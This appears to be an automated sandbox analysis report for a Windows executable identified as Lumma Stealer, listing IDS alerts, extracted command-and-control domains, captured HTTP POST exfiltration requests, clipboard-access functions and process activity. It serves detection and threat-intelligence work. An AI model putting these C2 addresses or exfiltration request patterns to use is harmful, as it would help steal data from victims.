Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49715 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49720 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: circujitstorm.bet
Source: Malware configuration extractor	URLs: explorebieology.run
Source: Malware configuration extractor	URLs: gadgethgfub.icu
Source: Malware configuration extractor	URLs: moderzysics.top
Source: Malware configuration extractor	URLs: techmindzs.live
Source: Malware configuration extractor	URLs: codxefusion.top
Source: Malware configuration extractor	URLs: phygcsforum.life
Source: Malware configuration extractor	URLs: techspherxe.top

Source: global traffic

TCP traffic: 192.168.2.8:56851 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49720 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=6uS.tfaKQ06xv_k5eXEyZX9Dlcc6cdiaQJaLbJi3.cQ-1741162353-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UHPVSOVYDCookie: __cf_mw_byp=6uS.tfaKQ06xv_k5eXEyZX9Dlcc6cdiaQJaLbJi3.cQ-1741162353-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12799Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=169D5VP2O1ZCZFF0O7RCookie: __cf_mw_byp=6uS.tfaKQ06xv_k5eXEyZX9Dlcc6cdiaQJaLbJi3.cQ-1741162353-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15088Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=S2X18N1NR38TI21GCookie: __cf_mw_byp=6uS.tfaKQ06xv_k5eXEyZX9Dlcc6cdiaQJaLbJi3.cQ-1741162353-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20237Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H2YWGH9EHUL3ZLU1ZWCookie: __cf_mw_byp=6uS.tfaKQ06xv_k5eXEyZX9Dlcc6cdiaQJaLbJi3.cQ-1741162353-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2471Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F8JSRCQ9AZOCookie: __cf_mw_byp=6uS.tfaKQ06xv_k5eXEyZX9Dlcc6cdiaQJaLbJi3.cQ-1741162353-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571841Host: circujitstorm.bet
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=6uS.tfaKQ06xv_k5eXEyZX9Dlcc6cdiaQJaLbJi3.cQ-1741162353-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: circujitstorm.bet

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: circujitstorm.bet

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: circujitstorm.bet

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Mar 2025 08:12:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RnBWL7tAEWIojVi4hIpg%2Bn6dMAO3SwgZggsLSc8vBDE8v1sbGD7Dfe4qQaCf6uLFjUvFkretELpIpSk9zu1U5Latf%2BE8JvX0qHK0lzjZTjwEu%2BBGDl96jWQn4ptx%2BB90PDmvbQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91b82623beaa4286-EWR

Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: MCxU5Fj.exe, 00000002.00000002.2651557958.0000000001147000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/
Source: MCxU5Fj.exe, 00000002.00000002.2651484311.0000000001130000.00000004.00000020.00020000.00000000.sdmp, MCxU5Fj.exe, 00000002.00000002.2651557958.0000000001147000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/api
Source: MCxU5Fj.exe, 00000002.00000002.2651363380.00000000010E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/api9
Source: MCxU5Fj.exe, 00000002.00000002.2651557958.0000000001147000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/apiPP5
Source: MCxU5Fj.exe, 00000002.00000002.2651192827.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet:443/api
Source: MCxU5Fj.exe, 00000002.00000002.2651192827.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet:443/apiMicrosoft
Source: MCxU5Fj.exe, 00000002.00000002.2651110601.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49720 version: TLS 1.2

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Code function: 2_2_00441250 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

2_2_00441250

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Code function: 2_2_03501000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

2_2_03501000

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Code function: 2_2_00441250 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

2_2_00441250

Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 0_2_03170870	0_2_03170870
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 0_2_03170860	0_2_03170860
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 0_2_03172D20	0_2_03172D20
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044F070	2_2_0044F070
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0041B090	2_2_0041B090
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00416160	2_2_00416160
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004379D8	2_2_004379D8
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044A990	2_2_0044A990
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00446A00	2_2_00446A00
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0040BA20	2_2_0040BA20
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00413AC6	2_2_00413AC6
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044FAE0	2_2_0044FAE0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00417A80	2_2_00417A80
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00412B60	2_2_00412B60
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00430B60	2_2_00430B60
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00429500	2_2_00429500
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00410598	2_2_00410598
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00446620	2_2_00446620
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0042D750	2_2_0042D750
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0041BF0B	2_2_0041BF0B
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00401040	2_2_00401040
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00413070	2_2_00413070
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00434870	2_2_00434870
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00434076	2_2_00434076
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0043D0E4	2_2_0043D0E4
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00428910	2_2_00428910
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0043B11B	2_2_0043B11B
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004219D0	2_2_004219D0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004389EF	2_2_004389EF
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004379F3	2_2_004379F3
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00414190	2_2_00414190
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00434870	2_2_00434870
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0041C99C	2_2_0041C99C
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0043C24D	2_2_0043C24D
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00432A56	2_2_00432A56
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00449278	2_2_00449278
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0040CA00	2_2_0040CA00
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00408A10	2_2_00408A10
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0040C210	2_2_0040C210
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00424A10	2_2_00424A10
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00436210	2_2_00436210
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00431220	2_2_00431220
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00427A2A	2_2_00427A2A
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0041DA38	2_2_0041DA38
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044B2C0	2_2_0044B2C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00402AE0	2_2_00402AE0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0040A290	2_2_0040A290
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0042E2A0	2_2_0042E2A0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044EAA0	2_2_0044EAA0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00443B48	2_2_00443B48
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00410B50	2_2_00410B50
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00421358	2_2_00421358
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0041C35E	2_2_0041C35E
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0040F360	2_2_0040F360
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00448370	2_2_00448370
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0043E320	2_2_0043E320
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00447B30	2_2_00447B30
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044E3C0	2_2_0044E3C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004373C5	2_2_004373C5
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0040EBE0	2_2_0040EBE0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0041D3E9	2_2_0041D3E9
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004253F0	2_2_004253F0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004443F1	2_2_004443F1
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00430382	2_2_00430382
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0043CBA1	2_2_0043CBA1
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0042A3B0	2_2_0042A3B0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0042F3B9	2_2_0042F3B9
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0041F446	2_2_0041F446
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00457C5D	2_2_00457C5D
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0043147E	2_2_0043147E
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00411C2A	2_2_00411C2A
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00433428	2_2_00433428
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004204C0	2_2_004204C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044E4C0	2_2_0044E4C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004274C4	2_2_004274C4
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0040B4D0	2_2_0040B4D0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004134DB	2_2_004134DB
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044E4D9	2_2_0044E4D9
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044E4DB	2_2_0044E4DB
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004034E0	2_2_004034E0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004204C0	2_2_004204C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0042E481	2_2_0042E481
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004094B0	2_2_004094B0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044F4B0	2_2_0044F4B0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00445D40	2_2_00445D40
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0042FD00	2_2_0042FD00
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00407D10	2_2_00407D10
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0043251B	2_2_0043251B
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00424D30	2_2_00424D30
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0041FDC0	2_2_0041FDC0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00429DF0	2_2_00429DF0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0040C580	2_2_0040C580
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044ED80	2_2_0044ED80
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0042C58C	2_2_0042C58C
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00432D90	2_2_00432D90
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00416DBC	2_2_00416DBC
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044E660	2_2_0044E660
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0043E670	2_2_0043E670
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00425630	2_2_00425630
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004206FF	2_2_004206FF
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00403E80	2_2_00403E80
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00417682	2_2_00417682
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00455F41	2_2_00455F41
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00406F56	2_2_00406F56
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00404762	2_2_00404762
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0041EF62	2_2_0041EF62
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0042DF70	2_2_0042DF70
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00420F70	2_2_00420F70
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00440F70	2_2_00440F70
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044E710	2_2_0044E710
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0041E724	2_2_0041E724
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00408F30	2_2_00408F30
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_004477C0	2_2_004477C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00444FF6	2_2_00444FF6
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0041BF80	2_2_0041BF80
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0043D79A	2_2_0043D79A
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044BF9A	2_2_0044BF9A
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_00445FA0	2_2_00445FA0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 2_2_0044F7B0	2_2_0044F7B0

Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: String function: 0041B080 appears 108 times
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: String function: 0040B2B0 appears 45 times

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 916

Source: MCxU5Fj.exe, 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePolitic.exe0 vs MCxU5Fj.exe
Source: MCxU5Fj.exe, 00000000.00000002.1469549291.000000000140E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs MCxU5Fj.exe
Source: MCxU5Fj.exe, 00000000.00000000.1406316613.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePolitic.exe0 vs MCxU5Fj.exe
Source: MCxU5Fj.exe	Binary or memory string: OriginalFilenamePolitic.exe0 vs MCxU5Fj.exe

Source: MCxU5Fj.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: MCxU5Fj.exe

Static PE information: Section: .CSS ZLIB complexity 1.0003255208333333

Source: MCxU5Fj.exe, ppuPHebcoIQOPplcqD.cs	Cryptographic APIs: 'CreateDecryptor'
Source: MCxU5Fj.exe, ppuPHebcoIQOPplcqD.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.MCxU5Fj.exe.4339550.0.raw.unpack, ppuPHebcoIQOPplcqD.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.MCxU5Fj.exe.4339550.0.raw.unpack, ppuPHebcoIQOPplcqD.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/5@1/1

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Code function: 2_2_00446A00 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_00446A00

Source: C:\Users\user\Desktop\MCxU5Fj.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7464

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\080e4fe7-e40e-40d5-b3b7-ca4206689558

Jump to behavior

Source: MCxU5Fj.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: MCxU5Fj.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MCxU5Fj.exe	Virustotal: Detection: 58%
Source: MCxU5Fj.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\MCxU5Fj.exe

File read: C:\Users\user\Desktop\MCxU5Fj.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\MCxU5Fj.exe "C:\Users\user\Desktop\MCxU5Fj.exe"
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process created: C:\Users\user\Desktop\MCxU5Fj.exe "C:\Users\user\Desktop\MCxU5Fj.exe"
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 916
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Process created: C:\Users\user\Desktop\MCxU5Fj.exe "C:\Users\user\Desktop\MCxU5Fj.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Section loaded: sspicli.dll	Jump to behavior
